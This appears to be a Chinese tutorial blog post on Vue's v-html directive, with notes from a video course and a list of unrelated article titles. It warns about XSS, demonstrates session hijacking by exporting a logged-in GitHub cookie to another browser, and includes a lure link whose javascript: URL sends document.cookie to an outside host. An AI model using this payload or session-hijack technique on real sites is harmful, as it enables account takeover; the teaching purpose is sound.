v-html指令总结：

1、作用：向指定节点中渲染包含html结构的内容

2、与插值语法的区别：

（1）v-html 会替换掉节点中所有的内容，{{}}则不会

（2）v-html 可以识别html 结构

3、特别注意：

（1）在网站上动态动态渲染任意HTML是非常危险的，容易导致XSS攻击

（2）一定要在可信的内容上使用v-html，永不要在用户提交的内容上使用

案例分析：

1、在google浏览器和火狐浏览器上安装 Cookie-Editor 插件：http://crx4.com/18460.html

2、在google 浏览器登陆githut 账号 ，使用Cookie-Editor插件将浏览器的Cookie数据导出

3、在火狐浏览器打开githut网站，然后删除Cookie数据，将从google浏览器导出的数据导入到火狐浏览器中，然后刷新页面，会发现火狐浏览器的githut会有登陆后的信息

（1）html

<!DOCTYPE html>

<head>

    <title>v-html</title>

    <script type="text/javascript" src="../js/vue.js"></script>

</head>

<body>

    <div id="root">

        <div v-html="str"></div>

    </div>

</body>

<script type="text/javascript">

    Vue.config.productionTip = false

    new Vue({

        el:"#root",

        data:{

            str:'<a href=javascript:location.href="http://baidu.com?"+document.cookie>兄弟，我找到你想要的资源了，快来！</a>'

        }

    })

</script>

（2）往页面加cookie数据

（3）点击链接，会将系统的cookie数据传走

链接：https://www.bilibili.com/video/BV1Zy4y1K7SH?p=41&spm_id_from=pageDriver&vd_source=60a28e8364654bee938864b1d19905ec

第41集

最新文章

1. solr4.5安装配置 linux+tomcat6.0+mmseg4j-1.9.1分词
2. HDMI学习
3. NYOJ之XX和OO
4. 2016年11月9日 星期三 --出埃及记 Exodus 19:25
5. magento添加多个产品到购物车(Add multiple products to cart )
6. Server Profiler
7. Effective Java2读书笔记-创建和销毁对象（四）
8. IRP 与 派遣函数
9. Spring_database_Template
10. How To Use Linux epoll with Python
11. python地理数据处理库geopy
12. win10系统电脑常用基本操作快捷键
13. C++Primer第五版学习笔记
14. 边框回归（bounding-Box regression）
15. 【转】最近很火的 Safe Area 到底是什么
16. latex之行内公式与行间公式
17. PHP策略模式demo
18. MOBA项目问题记录
19. 48.UIButton上的字体居右对齐
20. MongoDB数组修改器更新数据(转)

热门文章

1. TensorFlow中的Variable 变量
2. elementui树状结构添加右键点击事件
3. 设计模式，mvc,mvp,mvvm
4. didi-笔试
5. mysql(insert + group by + on duplicate key update)
6. flutter 多种情况tabbar高度问题，普通使用和嵌套使用高度问题（Tab）。
7. ES-分页查询
8. Nginx的重写功能——Rewrite
9. stl关联式容器的接口和实现
10. zookeeper在关闭服务时报could not find file /opt/module/zookeeper-3.5.10/zkData/zookeeper_server.pid